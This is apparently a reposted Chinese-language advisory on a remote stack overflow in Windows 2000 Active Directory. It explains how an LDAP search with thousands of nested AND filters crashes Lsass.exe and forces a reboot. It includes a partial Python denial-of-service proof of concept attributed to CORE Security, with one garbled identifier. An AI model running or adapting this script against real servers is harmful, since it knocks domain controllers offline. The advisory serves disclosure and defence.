当前位置:操作系统 > Windows 2003 >>

Microsoft Windows 活动目录远程堆栈溢出缺陷

涉及程序:
Win2k Active Directory

描述:
Microsoft Windows 活动目录远程堆栈溢出缺陷

详细:
Windows Active Directory(活动目录)是Windows 2000结构的重要组件,是Microsoft提供的强大的目录服务系统。

Windows活动目录的LDAP 3搜索请求功能对用户提交请求缺少正确缓冲区边界检查,远程攻击者可利用此缺陷使Lsass.exe服务崩溃,触发缓冲区溢出。

通过活动目录提供的目录服务基于LDAP协议和并使用协议存储和获得Active目录对象。活动目录中使用LDAP 3的'search request'请求功能存在问题,攻击者如果构建超过1000个"AND"的请求,并发送给服务器,可导致触发堆栈溢出,使Lsass.exe服务崩溃,系统会在30秒内重新启动。


攻击方法:
CORE Security Technologies Advisories (advisories@coresecurity.com)提供了如下测试方法:

下面是一段Python测试脚本:

------------------------------------
class ActiveDirectoryDOS( Ldap ):


def __init__(self):
self._s = None

self.host = '192.168.0.1'
self.basedn = 'dc=bugweek,dc=corelabs,dc=core-sdi,dc=com'
self.port = 389
self.buffer = ''
self.msg_id = 1
Ldap.__init__()


def generateFilter_BinaryOp( self, filter ):
filterBuffer = asn1.OCTETSTRING(filter[1]).encode() + asn1.OCTETSTRING(filter[2]).encode()
filterBuffer = self.encapsulateHeader( filter[0], filterBuffer )
return filterBuffer


def generateFilter_RecursiveBinaryOp( self, filter, numTimes):
易做图BinOp = self.generateFilter_BinaryOp( filter )
filterBuffer = 易做图BinOp
for cnt in range( 0, numTimes ):
filterBuffer = self.encapsulateHeader( self.LDAP_FILTER_AND, filterBuffer + 易做图BinOp )
return filterBuffer

 

def searchSub( self, filterBuffer ):


self.bindRequest()
self.searchRequest( filterBuffer )


   本篇文章共2页,此页为首页   下一页





def run(self, host = '', basedn = '', name = '' ):


# the machine must not exist
machine_name = 'xaxax'


filterComputerNotInDir = (Ldap.LDAP_FILTER_EQUALITY,'name',machine_name)


# execute the anonymous query
print 'executing query'
filterBuffer = self.generateFilter_RecursiveBinaryOp( filterComputerNotInDir, 7000 )
self.searchSub( filterBuffer )




   本篇文章共2页,此页为末页   首页


  

CopyRight © 2022 站长资源库 编程知识问答 zzzyk.com All Rights Reserved
部分文章来自网络,